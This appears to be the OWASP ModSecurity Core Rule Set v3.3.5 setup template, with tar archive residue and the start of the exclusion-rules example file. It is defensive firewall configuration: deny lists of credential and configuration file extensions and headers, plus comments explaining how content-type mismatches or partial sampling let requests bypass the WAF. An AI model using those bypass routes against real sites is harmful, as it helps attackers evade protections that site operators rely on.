# # -- [[ Alert Logging Control ]] -- # In the mode configuration, you must also adjust the desired logging options. # There are three common options for dealing with logging. By default CRS enables # logging to the webserver error log (or Event viewer) plus detailed logging to # the ModSecurity audit log (configured under SecAuditLog in modsecurity.conf). # # - To log to both error log and ModSecurity audit log file, use: "log,auditlog" # - To log *only* to the ModSecurity audit log file, use: "nolog,auditlog" # - To log *only* to the error log file, use: "log,noauditlog" # # Examples for the various modes follow. # You must leave one of the following options enabled. # Note that you must specify the same line for phase:1 and phase:2. # # Default: Anomaly Scoring mode, log to error log, log to ModSecurity audit log # - By default, offending requests are blocked with an error 403 response. # - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example # and review section 'Changing the Disruptive Action for Anomaly Mode'. # - In Apache, you can use ErrorDocument to show a friendly error page or # perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html # SecDefaultAction "phase:1,log,auditlog,pass" SecDefaultAction "phase:2,log,auditlog,pass" # Example: Anomaly Scoring mode, log only to ModSecurity audit log # - By default, offending requests are blocked with an error 403 response. # - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example # and review section 'Changing the Disruptive Action for Anomaly Mode'. # - In Apache, you can use ErrorDocument to show a friendly error page or # perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html # # SecDefaultAction "phase:1,nolog,auditlog,pass" # SecDefaultAction "phase:2,nolog,auditlog,pass" # Example: Self-contained mode, return error 403 on blocking # - In this configuration the default disruptive action becomes 'deny'. 
After a # rule triggers, it will stop processing the request and return an error 403. # - You can also use a different error status, such as 404, 406, et cetera. # - In Apache, you can use ErrorDocument to show a friendly error page or # perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html # # SecDefaultAction "phase:1,log,auditlog,deny,status:403" # SecDefaultAction "phase:2,log,auditlog,deny,status:403" # Example: Self-contained mode, redirect back to homepage on blocking # - In this configuration the 'tag' action includes the Host header data in the # log. This helps to identify which virtual host triggered the rule (if any). # - Note that this might cause redirect loops in some situations; for example # if a Cookie or User-Agent header is blocked, it will also be blocked when # the client subsequently tries to access the homepage. You can also redirect # to another custom URL. # - The redirect target is built from the Host request header, which the # client controls. If your web server does not restrict the Host values it # accepts, redirect to a fixed URL instead. # SecDefaultAction "phase:1,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'" # SecDefaultAction "phase:2,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'" # # -- [[ Paranoia Level Initialization ]] --------------------------------------- # # The Paranoia Level (PL) setting allows you to choose the desired level # of rule checks that will add to your anomaly scores. # # With each paranoia level increase, the CRS enables additional rules # giving you a higher level of security. However, higher paranoia levels # also increase the possibility of blocking some legitimate traffic due to # false alarms (also named false positives or FPs). If you use higher # paranoia levels, it is likely that you will need to add some exclusion # rules for certain requests and applications receiving complex input. # # - A paranoia level of 1 is the default. At this level, most core rules # are enabled. 
PL1 is advised for beginners, installations # covering many different sites and applications, and for setups # with standard security requirements. # At PL1 you should face FPs rarely. If you encounter FPs, please # open an issue on the CRS GitHub site and don't forget to attach your # complete Audit Log record for the request with the issue. Remove # personal data (passwords, IP addresses, domain names) from the log first. # - Paranoia level 2 includes many extra rules, for instance enabling # many regexp-based SQL and XSS injection protections, and adding # extra keywords checked for code injections. PL2 is advised # for moderate to experienced users desiring more complete coverage # and for installations with elevated security requirements. # PL2 comes with some FPs which you need to handle. # - Paranoia level 3 enables more rules and keyword lists, and tweaks # limits on special characters used. PL3 is aimed at users experienced # at the handling of FPs and at installations with a high security # requirement. # - Paranoia level 4 further restricts special characters. # The highest level is advised for experienced users protecting # installations with very high security requirements. Running PL4 will # likely produce a very high number of FPs which have to be # handled before the site can go into production. # # All rules will log their PL to the audit log; # example: [tag "paranoia-level/2"]. This allows you to deduce from the # audit log how the WAF behavior is affected by paranoia level. # # It is important to also look into the variable # tx.enforce_bodyproc_urlencoded (Enforce Body Processor URLENCODED) # defined below. Enabling it closes a possible bypass of CRS. # # Uncomment this rule to change the default: # #SecAction \ # "id:900000,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.paranoia_level=1" # It is possible to execute rules from a higher paranoia level but not include # them in the anomaly scoring. 
This allows you to take a well-tuned system on # paranoia level 1 and add rules from paranoia level 2 without having to fear # the new rules would lead to false positives that raise your score above the # threshold. # This optional feature is enabled by uncommenting the following rule and # setting the tx.executing_paranoia_level. # Technically, rules up to the level defined in tx.executing_paranoia_level # will be executed, but only the rules up to tx.paranoia_level affect the # anomaly scores. # By default, tx.executing_paranoia_level is set to tx.paranoia_level. # tx.executing_paranoia_level must not be lower than tx.paranoia_level. # # Please note that setting tx.executing_paranoia_level to a higher paranoia # level has the same performance impact as setting # tx.paranoia_level to said level. # #SecAction \ # "id:900001,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.executing_paranoia_level=1" # # -- [[ Enforce Body Processor URLENCODED ]] ----------------------------------- # # ModSecurity selects the body processor based on the Content-Type request # header. But clients do not always set the Content-Type header for their # request body payloads. This leaves ModSecurity with limited visibility into # the payload. The variable tx.enforce_bodyproc_urlencoded lets you force the # URLENCODED body processor in these situations. This is off by default, as it # implies a change of the behaviour of ModSecurity beyond CRS (the body # processor applies to all rules, not only CRS) and because it may lead to # false positives already on paranoia level 1. However, enabling this variable # closes a possible bypass of CRS so it should be considered. 
# # Uncomment this rule to change the default: # #SecAction \ # "id:900010,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.enforce_bodyproc_urlencoded=1" # # -- [[ Anomaly Mode Severity Levels ]] ---------------------------------------- # # Each rule in the CRS has an associated severity level. # These are the default scoring points for each severity level. # These settings will be used to increment the anomaly score if a rule matches. # You may adjust these points to your liking, but this is usually not needed. # # - CRITICAL severity: Anomaly Score of 5. # Mostly generated by the application attack rules (93x and 94x files). # - ERROR severity: Anomaly Score of 4. # Generated mostly from outbound leakage rules (95x files). # - WARNING severity: Anomaly Score of 3. # Generated mostly by malicious client rules (91x files). # - NOTICE severity: Anomaly Score of 2. # Generated mostly by the protocol rules (92x files). # # In anomaly mode, these scores are cumulative. # So it's possible for a request to hit multiple rules. # # (Note: In this file, we use 'phase:1' to set CRS configuration variables. # In general, 'phase:request' is used. However, we want to make absolutely sure # that all configuration variables are set before the CRS rules are processed.) # #SecAction \ # "id:900100,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.critical_anomaly_score=5,\ # setvar:tx.error_anomaly_score=4,\ # setvar:tx.warning_anomaly_score=3,\ # setvar:tx.notice_anomaly_score=2" # # -- [[ Anomaly Mode Blocking Threshold Levels ]] ------------------------------ # # Here, you can specify at which cumulative anomaly score an inbound request, # or outbound response, gets blocked. # # Most detected inbound threats will give a critical score of 5. # Smaller violations, like violations of protocol/standards, carry lower scores. 
# # [ At default value ] # If you keep the blocking thresholds at the defaults, the CRS will work # similarly to previous CRS versions: a single critical rule match will cause # the request to be blocked and logged. # # [ Using higher values ] # If you want to make the CRS less sensitive, you can increase the blocking # thresholds, for instance to 7 (which would require multiple rule matches # before blocking) or 10 (which would require at least two critical alerts - or # a combination of many lesser alerts), or even higher. However, increasing the # thresholds might cause some attacks to bypass the CRS rules or your policies. # # [ New deployment strategy: Starting high and decreasing ] # It is a common practice to start a fresh CRS installation with elevated # anomaly scoring thresholds (>100) and then lower the limits as your # confidence in the setup grows. You may also look into the Sampling # Percentage section below for a different strategy to ease into a new # CRS installation. # # [ Anomaly Threshold / Paranoia Level Quadrant ] # # High Anomaly Limit | High Anomaly Limit # Low Paranoia Level | High Paranoia Level # -> Fresh Site | -> Experimental Site # ------------------------------------------------------ # Low Anomaly Limit | Low Anomaly Limit # Low Paranoia Level | High Paranoia Level # -> Standard Site | -> High Security Site # # Uncomment this rule to change the defaults: # #SecAction \ # "id:900110,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.inbound_anomaly_score_threshold=5,\ # setvar:tx.outbound_anomaly_score_threshold=4" # # -- [[ Application Specific Rule Exclusions ]] ---------------------------------------- # # Some well-known applications may undertake actions that appear to be # malicious. This includes actions such as allowing HTML or Javascript within # parameters. 
In such cases the CRS aims to prevent false positives by allowing # administrators to enable prebuilt, application specific exclusions on an # application by application basis. # These application specific exclusions are distinct from the rules that would # be placed in the REQUEST-900-EXCLUSION-RULES-BEFORE-CRS configuration file as # they are prebuilt for specific applications. The 'REQUEST-900' file is # designed for users to add their own custom exclusions. Note, using these # application specific exclusions may loosen restrictions of the CRS, # especially if used with an application they weren't designed for. As a result # they should be applied with care. # To use this functionality you must specify a supported application. To do so # uncomment rule 900130. In addition to uncommenting the rule you will need to # specify which application(s) you'd like to enable exclusions for. Only a # (very) limited set of applications are currently supported, please use the # filenames prefixed with 'REQUEST-903' to guide you in your selection. 
# Such filenames use the following convention: # REQUEST-903.9XXX-{APPNAME}-EXCLUSIONS-RULES.conf # # It is recommended if you run multiple web applications on your site to limit # the effects of the exclusion to only the path where the excluded webapp # resides using a rule similar to the following example: # SecRule REQUEST_URI "@beginsWith /wordpress/" setvar:tx.crs_exclusions_wordpress=1 # # Modify and uncomment this rule to select which application: # #SecAction \ # "id:900130,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.crs_exclusions_cpanel=1,\ # setvar:tx.crs_exclusions_drupal=1,\ # setvar:tx.crs_exclusions_dokuwiki=1,\ # setvar:tx.crs_exclusions_nextcloud=1,\ # setvar:tx.crs_exclusions_wordpress=1,\ # setvar:tx.crs_exclusions_xenforo=1" # # -- [[ HTTP Policy Settings ]] ------------------------------------------------ # # This section defines your policies for the HTTP protocol, such as: # - allowed HTTP versions, HTTP methods, allowed request Content-Types # - forbidden file extensions (e.g. .bak, .sql) and request headers (e.g. Proxy) # # These variables are used in the following rule files: # - REQUEST-911-METHOD-ENFORCEMENT.conf # - REQUEST-912-DOS-PROTECTION.conf # - REQUEST-920-PROTOCOL-ENFORCEMENT.conf # HTTP methods that a client is allowed to use. # Default: GET HEAD POST OPTIONS # Example: for RESTful APIs, add the following methods: PUT PATCH DELETE # Example: for WebDAV, add the following methods: CHECKOUT COPY DELETE LOCK # MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH PUT UNLOCK # Uncomment this rule to change the default. #SecAction \ # "id:900200,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" # Content-Types that a client is allowed to send in a request. 
# Default: |application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| # |text/xml| |application/xml| |application/soap+xml| |application/json| # |application/cloudevents+json| |application/cloudevents-batch+json| # # Please note that the rule where CRS uses this variable (920420) evaluates it with operator # `@within`, which is case sensitive, but uses t:lowercase. You must therefore write any custom # Content-Type entirely in lowercase. # # Bypass Warning: some applications may not rely on the content-type request header in order # to parse the request body. This could allow an attacker to send malicious URLENCODED/JSON/XML # payloads without being detected by the WAF. Allowing a request content-type that doesn't activate any # body processor (for example: "text/plain", "application/x-amf", "application/octet-stream", etc.) # could lead to a WAF bypass. For example, a malicious JSON payload submitted with a "text/plain" # content type may still be interpreted as JSON by a backend application but would not trigger the # JSON body parser at the WAF, leading to a bypass. # # To avoid blocking requests with a content-type that is not allowed by default, you can create an exclusion # rule that removes rule 920420. For example: # SecRule REQUEST_HEADERS:Content-Type "@rx ^text/plain" \ # "id:1234,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # ctl:ruleRemoveById=920420,\ # chain" # SecRule REQUEST_URI "@rx ^/foo/bar" "t:none" # # Uncomment this rule to change the default. # #SecAction \ # "id:900220,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'" # Allowed HTTP versions. 
# Default: HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 # Example for legacy clients: HTTP/0.9 HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 # Note that some web server versions use 'HTTP/2', some 'HTTP/2.0', so # we include both version strings by default. # Uncomment this rule to change the default. #SecAction \ # "id:900230,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'" # Forbidden file extensions. # Guards against unintended exposure of development/configuration files. # Default: .asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/ # Example: .bak/ .config/ .conf/ .db/ .ini/ .log/ .old/ .pass/ .pdb/ .rdb/ .sql/ # Uncomment this rule to change the default. #SecAction \ # "id:900240,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" # Forbidden request headers. # Header names should be lowercase, enclosed by /slashes/ as delimiters. # Default: /accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ # # Note: Accept-Charset is a deprecated header that should not be used by clients and # ignored by servers. It can be used for a response WAF bypass, by asking for a charset # that the WAF cannot decode. 
# Reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Charset # # Note: Content-Encoding is used to list any encodings that have been applied to the # original payload. It is only used for compression, which isn't supported by CRS by # default since it blocks newlines and null bytes inside the request body. Most # compression algorithms require at least null bytes per RFC. Blocking it shouldn't # break anything and increases security since ModSecurity is incapable of properly # scanning compressed request bodies. # # Note: Blocking Proxy header prevents 'httpoxy' vulnerability: https://httpoxy.org # # Uncomment this rule to change the default. #SecAction \ # "id:900250,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.restricted_headers=/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/'" # File extensions considered static files. # Extensions include the dot, lowercase, enclosed by /slashes/ as delimiters. # Used in DoS protection rule. See section "Anti-Automation / DoS Protection". # Default: /.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/ # Uncomment this rule to change the default. #SecAction \ # "id:900260,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'" # Content-Types charsets that a client is allowed to send in a request. # Default: utf-8|iso-8859-1|iso-8859-15|windows-1252 # Uncomment this rule to change the default. # Use "|" to separate multiple charsets like in the rule defining # tx.allowed_request_content_type. #SecAction \ # "id:900280,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'" # # -- [[ HTTP Argument/Upload Limits ]] ----------------------------------------- # # Here you can define optional limits on HTTP get/post parameters and uploads. 
# This can help to prevent application specific DoS attacks. # # These values are checked in REQUEST-920-PROTOCOL-ENFORCEMENT.conf. # Beware of blocking legitimate traffic when enabling these limits. # # Block request if number of arguments is too high # Default: unlimited # Example: 255 # Uncomment this rule to set a limit. #SecAction \ # "id:900300,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.max_num_args=255" # Block request if the length of any argument name is too high # Default: unlimited # Example: 100 # Uncomment this rule to set a limit. #SecAction \ # "id:900310,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.arg_name_length=100" # Block request if the length of any argument value is too high # Default: unlimited # Example: 400 # Uncomment this rule to set a limit. #SecAction \ # "id:900320,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.arg_length=400" # Block request if the total length of all combined arguments is too high # Default: unlimited # Example: 64000 # Uncomment this rule to set a limit. #SecAction \ # "id:900330,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.total_arg_length=64000" # Block request if the file size of any individual uploaded file is too high # Default: unlimited # Example: 1048576 # Uncomment this rule to set a limit. #SecAction \ # "id:900340,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.max_file_size=1048576" # Block request if the total size of all combined uploaded files is too high # Default: unlimited # Example: 1048576 # Uncomment this rule to set a limit. #SecAction \ # "id:900350,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.combined_file_sizes=1048576" # # -- [[ Easing In / Sampling Percentage ]] ------------------------------------- # # Adding the Core Rule Set to an existing productive site can lead to false # positives, unexpected performance issues and other undesired side effects. 
# # It can be beneficial to test the water first by enabling the CRS for a # limited number of requests only and then, when you have solved the issues (if # any) and you have confidence in the setup, to raise the ratio of requests # being sent into the ruleset. # # Adjust the percentage of requests that are funnelled into the Core Rules by # setting TX.sampling_percentage below. The default is 100, meaning that every # request gets checked by the CRS. The selection of requests, which are going # to be checked, is based on a pseudo random number generated by ModSecurity. # # If a request is allowed to pass without being checked by the CRS, there is no # entry in the audit log (for performance reasons), but an error log entry is # written. If you want to disable the error log entry, then issue the # following directive somewhere after the inclusion of the CRS # (E.g., RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf). # # SecRuleUpdateActionById 901150 "nolog" # # ATTENTION: If this TX.sampling_percentage is below 100, then some of the # requests will bypass the Core Rules completely and you lose the ability to # protect your service with ModSecurity. # # Uncomment this rule to enable this feature: # #SecAction "id:900400,\ # phase:1,\ # pass,\ # nolog,\ # setvar:tx.sampling_percentage=100" # # -- [[ Project Honey Pot HTTP Blacklist ]] ------------------------------------ # # Optionally, you can check the client IP address against the Project Honey Pot # HTTPBL (dnsbl.httpbl.org). In order to use this, you need to register to get a # free API key. Set it here with SecHttpBlKey. # # Project Honeypot returns multiple different malicious IP types. # You may specify which you want to block by enabling or disabling them below. 
# # Ref: https://www.projecthoneypot.org/httpbl.php # Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecHttpBlKey # # Uncomment these rules to use this feature: # #SecHttpBlKey XXXXXXXXXXXXXXXXX #SecAction "id:900500,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.block_search_ip=1,\ # setvar:tx.block_suspicious_ip=1,\ # setvar:tx.block_harvester_ip=1,\ # setvar:tx.block_spammer_ip=1" # # -- [[ GeoIP Database ]] ------------------------------------------------------ # # There are some rulesets that inspect geolocation data of the client IP address # (geoLookup). The CRS uses geoLookup to implement optional country blocking. # # To use geolocation, we make use of the MaxMind GeoIP database. # This database is not included with the CRS and must be downloaded. # # There are two formats for the GeoIP database. ModSecurity v2 uses GeoLite (.dat files), # and ModSecurity v3 uses GeoLite2 (.mmdb files). # # If you use ModSecurity 3, MaxMind provides a binary for updating GeoLite2 files, # see https://github.com/maxmind/geoipupdate. # # Download the package for your OS, and read https://dev.maxmind.com/geoip/geoipupdate/ # for configuration options. # # Warning: GeoLite (not GeoLite2) databases are considered legacy, and not being updated anymore. # See https://support.maxmind.com/geolite-legacy-discontinuation-notice/ for more info. # # Therefore, if you use ModSecurity v2, you need to regenerate updated .dat files # from CSV files first. # # You can achieve this using https://github.com/sherpya/geolite2legacy # Pick the zip files from maxmind site: # https://geolite.maxmind.com/download/geoip/database/GeoLite2-Country-CSV.zip # # Follow the guidelines for installing the tool and run: # ./geolite2legacy.py -i GeoLite2-Country-CSV.zip \ # -f geoname2fips.csv -o /usr/share/GeoliteCountry.dat # # Update the database regularly, see Step 3 of the configuration link above. 
# # By default, when you execute `sudo geoipupdate` on Linux, files from the free database # will be downloaded to `/usr/share/GeoIP` (both v1 and v2). # # Then choose from: # - `GeoLite2-Country.mmdb` (if you are using ModSecurity v3) # - `GeoLiteCountry.dat` (if you are using ModSecurity v2) # # Ref: http://blog.spiderlabs.com/2010/10/detecting-malice-with-modsecurity-geolocation-data.html # Ref: http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html # # Uncomment only one of the next rules here to use this feature. # Choose the one depending on the ModSecurity version you are using, and change the path accordingly: # # For ModSecurity v3: #SecGeoLookupDB /usr/share/GeoIP/GeoLite2-Country.mmdb # For ModSecurity v2 (points to the converted one): #SecGeoLookupDB /usr/share/GeoIP/GeoLiteCountry.dat # # -=[ Block Countries ]=- # # Rules in the IP Reputation file can check the client against a list of high # risk country codes. These countries have to be defined in the variable # tx.high_risk_country_codes via their ISO 3166 two-letter country code: # https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2#Officially_assigned_code_elements # # If you are sure that you are not getting any legitimate requests from a given # country, then you can disable all access from that country via this variable. # The rule performing the test has the rule id 910100. # # This rule requires SecGeoLookupDB to be enabled and the GeoIP database to be # downloaded (see the section "GeoIP Database" above.) # # By default, the list is empty. 
A list used by some sites was the following: # setvar:'tx.high_risk_country_codes=UA ID YU LT EG RO BG TR RU PK MY CN'" # # Uncomment this rule to use this feature: # #SecAction \ # "id:900600,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.high_risk_country_codes='" # # -- [[ Anti-Automation / DoS Protection ]] ------------------------------------ # # Optional DoS protection against clients making requests too quickly. # # When a client is making more than 100 requests (excluding static files) within # 60 seconds, this is considered a 'burst'. After two bursts, the client is # blocked for 600 seconds. # # Requests to static files are not counted towards DoS; they are listed in the # 'tx.static_extensions' setting, which you can change in this file (see # section "HTTP Policy Settings"). # # For a detailed description, see rule file REQUEST-912-DOS-PROTECTION.conf. # # Uncomment this rule to use this feature: # #SecAction \ # "id:900700,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.dos_burst_time_slice=60',\ # setvar:'tx.dos_counter_threshold=100',\ # setvar:'tx.dos_block_timeout=600'" # # -- [[ Check UTF-8 encoding ]] ------------------------------------------------ # # The CRS can optionally check request contents for invalid UTF-8 encoding. # We only want to apply this check if UTF-8 encoding is actually used by the # site; otherwise it will result in false positives. # # Uncomment this rule to use this feature: # #SecAction \ # "id:900950,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.crs_validate_utf8_encoding=1" # # -- [[ Blocking Based on IP Reputation ]] ------------------------------------ # # Blocking based on reputation is permanent in the CRS. Unlike other rules, # which look at the individual request, the blocking of IPs is based on # a persistent record in the IP collection, which remains active for a # certain amount of time. 
# # There are two ways an individual client can become flagged for blocking: # - External information (RBL, GeoIP, etc.) # - Internal information (Core Rules) # # The record in the IP collection carries a flag, which tags requests from # individual clients with a flag named IP.reput_block_flag. # But the flag alone is not enough to have a client blocked. There is also # a global switch named tx.do_reput_block. This is off by default. If you set # it to 1 (=On), requests from clients with the IP.reput_block_flag will # be blocked for a certain duration. # # Variables # ip.reput_block_flag Blocking flag for the IP collection record # ip.reput_block_reason Reason (= rule message) that caused to blocking flag # tx.do_reput_block Switch deciding if we really block based on flag # tx.reput_block_duration Setting to define the duration of a block # # It may be important to know, that all the other core rules are skipped for # requests, when it is clear that they carry the blocking flag in question. # # Uncomment this rule to use this feature: # #SecAction \ # "id:900960,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.do_reput_block=1" # # Uncomment this rule to change the blocking time: # Default: 300 (5 minutes) # #SecAction \ # "id:900970,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.reput_block_duration=300" # # -- [[ Collection timeout ]] -------------------------------------------------- # # Set the SecCollectionTimeout directive from the ModSecurity default (1 hour) # to a lower setting which is appropriate to most sites. # This increases performance by cleaning out stale collection (block) entries. # # This value should be greater than or equal to: # tx.reput_block_duration (see section "Blocking Based on IP Reputation") and # tx.dos_block_timeout (see section "Anti-Automation / DoS Protection"). # # Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecCollectionTimeout # Please keep this directive uncommented. 
# Default: 600 (10 minutes); the value is given in seconds.
SecCollectionTimeout 600


#
# -- [[ End of setup ]] --------------------------------------------------------
#
# The CRS checks the tx.crs_setup_version variable to ensure that the setup
# has been loaded. If you are not planning to use this setup template,
# you must manually set the tx.crs_setup_version variable before including
# the CRS rules/* files.
#
# The variable is a numerical representation of the CRS version number.
# E.g., v3.0.0 is represented as 300.
#
# 335 stands for this release, v3.3.5. While the variable is unset, rule 901001
# in REQUEST-901-INITIALIZATION.conf denies every request with status 500, so
# keep this rule active and loaded before the rules/* files.
#
SecAction \
 "id:900990,\
  phase:1,\
  pass,\
  t:none,\
  nolog,\
  setvar:tx.crs_setup_version=335"
modsecurity-crs-3.3.5/docs/000077500000000000000000000000001446122515100156075ustar00rootroot00000000000000modsecurity-crs-3.3.5/docs/README000066400000000000000000000011351446122515100164670ustar00rootroot00000000000000Welcome to the OWASP Core Rule Set (CRS) documentation. The OWASP CRS documentation is generated as a Sphinx project and is stored in a separate Github repository. While the documentation is available as part of the CRS project it is provided in the form of a git-submodule. Using a git-submodule allow us to update the documentation without making changes to the main rule repository. You can download the documentation using git: $ git submodule init $ git submodule update Alternatively, the latest version of the documentation is available at https://www.modsecurity.org/CRS/Documentation/ modsecurity-crs-3.3.5/rules/000077500000000000000000000000001446122515100160115ustar00rootroot00000000000000modsecurity-crs-3.3.5/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example000066400000000000000000000167521446122515100256070ustar00rootroot00000000000000# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.5
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
# # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # The purpose of this file is to hold LOCAL exceptions for your site. The # types of rules that would go into this file are one where you want to # short-circuit inspection and allow certain transactions to pass through # inspection or if you want to alter rules that are applied. # # This file is named REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example for a # very specific reason. Files affixed with the .example extension are designed # to contain user created/modified data. The '.example'. extension should be # renamed to end in .conf. The advantage of this is that when OWASP CRS is # updated, the updates will not overwrite a user generated configuration file. # # As a result of this design paradigm users are encouraged NOT to directly # modify rules. Instead they should use this # REQUEST-900-EXCLUSION-RULES-BEFORE-CRS and the # RESPONSE-999-EXCLUSION-RULES-AFTER-CRS file to modify OWASP rules using # methods similar to the examples specified below. # # REQUEST-900-EXCLUSION-RULES-BEFORE-CRS and # RESPONSE-999-EXCLUSION-RULES-AFTER-CRS serve different purposes. ModSecurity # effectively maintains two different context: startup, and per transaction. # As a rule, directives are processed within the startup context. While they # can affect the per transaction context they generally remain fixed during the # execution of ModSecurity. # # As a result if one wanted to disable a rule at bootup the SecRuleRemoveById # directive or one of its siblings would have to be placed AFTER the rule is # listed, otherwise it will not have knowledge of the rules existence (since # these rules are read in at the same time). This means that when using # directives that effect SecRules, these exceptions should be placed AFTER all # the existing rules. 
This is why RESPONSE-999-EXCLUSION-RULES-AFTER-CRS is # designed such that it loads LAST. # # Conversely, ModSecurity supports several actions that can change the state of # the underlying configuration during the per transaction context, this is when # rules are being processed. Generally, these are accomplished by using the # 'ctl' action. As these are part of a rule, they will be evaluated in the # order rules are applied (by physical location, considering phases). As a # result of this ordering a 'ctl' action should be placed with consideration to # when it will be executed. This is particularly relevant for the 'ctl' options # that involve modifying ID's (such as ruleRemoveById). In these cases it is # important that such rules are placed BEFORE the rule ID they will affect. # Unlike the setup context, by the time we process rules in the per-transaction # context, we are already aware of all the rule ID's. It is by this logic that # we include rules such as this BEFORE all the remaining rules. As a result # REQUEST-900-EXCLUSION-RULES-BEFORE-CRS is designed to load FIRST. 
